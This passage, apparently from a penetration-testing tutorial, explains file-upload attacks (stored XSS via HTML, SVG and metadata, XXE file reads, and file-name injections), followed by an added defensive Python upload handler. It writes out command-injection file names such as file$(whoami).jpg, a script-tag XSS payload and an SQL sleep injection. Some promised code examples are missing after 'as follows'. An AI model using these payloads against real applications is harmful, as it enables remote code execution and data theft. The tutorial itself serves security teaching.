Many file types may allow us to introduce a Stored XSS vulnerability to the web application by uploading maliciously crafted versions of them.
The most basic example is when a web application allows us to upload HTML files. Although HTML files won't allow us to execute server-side code (e.g., PHP), it would still be possible to embed JavaScript code within them to carry out an XSS or CSRF attack on whoever visits the uploaded HTML page.
We can include an XSS payload in one of the metadata parameters that accept raw text, like the Comment or Artist parameters, as follows:
XSS attacks can also be carried out with SVG images, along with several other attacks. Scalable Vector Graphics (SVG) images are XML-based, and they describe 2D vector graphics, which the browser renders into an image. For this reason, we can modify their XML data to include an XSS payload. For example:
XXE
With SVG images, we can also include malicious XML data to leak the source code of the web application and other internal documents within the server.
We can also use XXE to read source code in PHP web applications:
Injections in File Name
For example, if we name a file file$(whoami).jpg or file`whoami`.jpg or file.jpg||whoami, and the web application then attempts to move the uploaded file with an OS command (e.g. mv file /tmp), our file name would inject the whoami command, which would get executed, giving us RCE.
Similarly, we may use an XSS payload in the file name (e.g. <script>alert(window.origin);</script>), which would get executed on the target's machine if the file name is displayed to them. We may also inject an SQL query in the file name (e.g. file';select+sleep(5);--.jpg), which may lead to an SQL injection if the file name is insecurely used in an SQL query.
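The following is an added example, not code from the original page: a sketch of an upload handler in which none of the three file-name injections above can reach a shell, an HTML page, or an SQL statement. The function names, the extension allowlist and the uploads table are assumptions made for illustration.

```python
import html
import os
import secrets
import shutil
import sqlite3

# Assumed allowlist for an image-upload feature; adjust to the application.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def stored_name(client_name: str) -> str:
    """Build the on-disk name server-side; only an allowlisted extension survives."""
    ext = os.path.splitext(client_name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    return secrets.token_hex(16) + ext


def move_upload(tmp_path: str, client_name: str, dest_dir: str) -> str:
    """Move with a library call, so no shell ever parses the file name."""
    dest = os.path.join(dest_dir, stored_name(client_name))
    shutil.move(tmp_path, dest)
    return dest


def record_upload(conn: sqlite3.Connection, stored: str, client_name: str) -> None:
    """Bind the client-supplied name as a parameter, never concatenate it into SQL."""
    conn.execute(
        "INSERT INTO uploads (stored, original) VALUES (?, ?)",
        (stored, client_name),
    )


def display_name(client_name: str) -> str:
    """HTML-encode the original name before writing it into a page."""
    return html.escape(client_name, quote=True)
```

The client-supplied name is kept only as data (a bound SQL parameter, an encoded string for display), while the name used on disk is generated by the server.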